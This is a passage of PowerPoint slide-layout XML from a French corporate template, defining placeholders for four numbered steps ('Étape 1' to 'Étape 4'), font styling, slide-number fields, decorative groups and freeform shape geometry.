                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Date</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Espace réservé du texte 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5985F64B-378C-4E7A-905E-42725C27FB6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="24" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="525011" y="4927764"/>
            <a:ext cx="2264488" cy="286232"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400" b="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gilroy ExtraBold" panose="020B0604020202020204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Étape 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Espace réservé du texte 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76A0C522-E493-41C0-B850-3C8F433EF604}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="25" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="525011" y="5286579"/>
            <a:ext cx="2264488" cy="590931"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1200" b="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>Click here to insert your text, Gilroy font, font size 12, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>without bold</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Espace réservé du texte 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6669F93D-BC9B-493C-997E-404214589050}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="26" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3354347" y="4927764"/>
            <a:ext cx="2264488" cy="286232"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400" b="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gilroy ExtraBold" panose="020B0604020202020204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Étape 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Espace réservé du texte 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAFE417A-51FF-4646-A38B-969C39B68FEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="27" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3354347" y="5286579"/>
            <a:ext cx="2264488" cy="590931"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1200" b="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>Click here to insert your text, Gilroy font, font size 12, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>without bold</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Espace réservé du texte 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BC1F530-741A-4E00-8925-FCA3F572B413}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="28" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183683" y="4927764"/>
            <a:ext cx="2264488" cy="286232"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400" b="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gilroy ExtraBold" panose="020B0604020202020204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Étape 3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Espace réservé du texte 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E662988-6487-4CAA-BF14-96DF2F2634D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="29" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183683" y="5286579"/>
            <a:ext cx="2264488" cy="590931"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1200" b="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>Click here to insert your text, Gilroy font, font size 12, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>without bold</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Espace réservé du texte 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB1712FA-6599-4B8C-9C0B-4B0141D41755}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="30" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9013020" y="4927764"/>
            <a:ext cx="2264488" cy="286232"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400" b="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gilroy ExtraBold" panose="020B0604020202020204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Étape 4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Espace réservé du texte 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB5B5878-551E-4193-828A-3F8967A08BCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="31" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9013020" y="5286579"/>
            <a:ext cx="2264488" cy="590931"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1200" b="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>Click here to insert your text, Gilroy font, font size 12, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>without bold</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="26" name="Groupe 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4ED6B273-A3CF-4ACF-970B-A83DA04396D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12327910" y="4868227"/>
            <a:ext cx="1885826" cy="1989773"/>
            <a:chOff x="511520" y="2588002"/>
            <a:chExt cx="1885826" cy="1989773"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="Freeform 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77822DB7-0834-44C5-849D-C8A4048CFA77}"/>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6" name="Rectangle 35">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{805B7E8A-96D0-4E3C-B553-1B937F9BB617}"/>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37" name="Groupe 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76D81637-9621-4B96-8D58-4AE4975BFB82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12327910" y="0"/>
            <a:ext cx="1885826" cy="1681996"/>
            <a:chOff x="511520" y="2588002"/>
            <a:chExt cx="1885826" cy="1681996"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="Freeform 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3796D16-6E7F-488C-BA0B-BB25B8B3ED32}"/>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9" name="Rectangle 38">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABE423A6-1FB2-4396-AE09-4565E75D8DA7}"/>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d’image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Supprimer l’image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en place</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l’icone</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au milieu du bloc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l’image souhaitée dans votre ordinateur</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23851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title + Free (Frame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56B06170-AF06-4468-96E7-0D2036A367AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="17"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8" name="Espace réservé du numéro de diapositive 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{804C5343-499B-4BF1-A833-E1D95D91F157}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="18"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F0EC0192-3772-4180-BB8D-B031004094FB}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle : avec coin arrondi 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEACFE01-D4D4-4DB6-BC6D-CCD328BE55DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="370391" y="833377"/>
            <a:ext cx="11526418" cy="5347503"/>
          </a:xfrm>
          <a:prstGeom prst="round1Rect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3642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 name="Titre 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8FA6B15-855F-4994-BE5E-A1EB4E1F532B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="558165"/>
            <a:ext cx="4128228" cy="424732"/>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5" name="Espace réservé du texte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE56AEA4-E95E-4B53-A965-6C20A29E2813}"/>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11" name="Groupe 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3905883-D110-401D-B465-83F82DF290FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12327910" y="4868227"/>
            <a:ext cx="1885826" cy="1989773"/>
            <a:chOff x="511520" y="2588002"/>
            <a:chExt cx="1885826" cy="1989773"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Freeform 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBA95259-1C49-4786-B258-21DB1E7E8883}"/>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3" name="Rectangle 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C84EBE5-789D-467C-B762-263429195ABA}"/>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326719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 Subtitle + Free (Unframe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56B06170-AF06-4468-96E7-0D2036A367AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="17"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8" name="Espace réservé du numéro de diapositive 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{804C5343-499B-4BF1-A833-E1D95D91F157}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="18"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F0EC0192-3772-4180-BB8D-B031004094FB}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Titre 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8FA6B15-855F-4994-BE5E-A1EB4E1F532B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="558165"/>
            <a:ext cx="4128228" cy="424732"/>
          </a:xfrm>
          <a:no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5" name="Espace réservé du texte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE56AEA4-E95E-4B53-A965-6C20A29E2813}"/>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10" name="Groupe 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAD3177A-2003-4B4C-B5B1-6295CB91E04A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12327910" y="4868227"/>
            <a:ext cx="1885826" cy="1989773"/>
            <a:chOff x="511520" y="2588002"/>
            <a:chExt cx="1885826" cy="1989773"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Freeform 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{052AAD40-811D-45DA-9839-E42E2540F10C}"/>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2" name="Rectangle 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5014E0D9-3610-4B45-8B64-7262761DF0E2}"/>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113082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Empty">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10" name="Espace réservé du texte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37DE50F4-3A67-4B5A-A44D-EEFCC18C06A4}"/>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A42926BB-6F44-4C31-AC03-C45539B56F4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="19"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F0EC0192-3772-4180-BB8D-B031004094FB}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Image 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{368BA3B1-E4B6-43C1-B831-C180276EECB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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Groupe 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{451FFB64-9B40-4222-BFD1-A80BFB0A80E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12327910" y="4868227"/>
            <a:ext cx="1885826" cy="1989773"/>
            <a:chOff x="511520" y="2588002"/>
            <a:chExt cx="1885826" cy="1989773"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Freeform 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42396997-C1A7-4945-A1CF-F65E7DF5DCFA}"/>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13" name="Rectangle 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA43B78E-AD68-490C-B7A1-41AC35B0DD2F}"/>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234667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E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Image 6" descr="Une image contenant texte, tableau noir&#10;&#10;Description générée automatiquement">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6DBC187-082E-4BD4-ADDB-140D6511928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B9561FD-919C-4419-8F04-B358DBECE623}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4342436" y="3006524"/>
            <a:ext cx="3507129" cy="8449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9" name="Groupe 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28D3588F-15F7-4C57-BBF7-82EFE9DBB722}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4691605" y="3272565"/>
            <a:ext cx="2808790" cy="312872"/>
            <a:chOff x="4071936" y="3205162"/>
            <a:chExt cx="4044593" cy="450532"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Forme libre : forme 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB44CE92-1CB0-48A4-9549-72D0ECD3AAFA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4071936" y="3213138"/>
              <a:ext cx="320053" cy="434554"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 276180 w 320053"/>
                <a:gd name="connsiteY0" fmla="*/ 38079 h 434554"/>
                <a:gd name="connsiteX1" fmla="*/ 226840 w 320053"/>
                <a:gd name="connsiteY1" fmla="*/ 9504 h 434554"/>
                <a:gd name="connsiteX2" fmla="*/ 163880 w 320053"/>
                <a:gd name="connsiteY2" fmla="*/ -21 h 434554"/>
                <a:gd name="connsiteX3" fmla="*/ -45 w 320053"/>
                <a:gd name="connsiteY3" fmla="*/ -21 h 434554"/>
                <a:gd name="connsiteX4" fmla="*/ -45 w 320053"/>
                <a:gd name="connsiteY4" fmla="*/ 434510 h 434554"/>
                <a:gd name="connsiteX5" fmla="*/ 88823 w 320053"/>
                <a:gd name="connsiteY5" fmla="*/ 434510 h 434554"/>
                <a:gd name="connsiteX6" fmla="*/ 88823 w 320053"/>
                <a:gd name="connsiteY6" fmla="*/ 281062 h 434554"/>
                <a:gd name="connsiteX7" fmla="*/ 163880 w 320053"/>
                <a:gd name="connsiteY7" fmla="*/ 281062 h 434554"/>
                <a:gd name="connsiteX8" fmla="*/ 226840 w 320053"/>
                <a:gd name="connsiteY8" fmla="*/ 270870 h 434554"/>
                <a:gd name="connsiteX9" fmla="*/ 276180 w 320053"/>
                <a:gd name="connsiteY9" fmla="*/ 242295 h 434554"/>
                <a:gd name="connsiteX10" fmla="*/ 308469 w 320053"/>
                <a:gd name="connsiteY10" fmla="*/ 197814 h 434554"/>
                <a:gd name="connsiteX11" fmla="*/ 319995 w 320053"/>
                <a:gd name="connsiteY11" fmla="*/ 140664 h 434554"/>
                <a:gd name="connsiteX12" fmla="*/ 308469 w 320053"/>
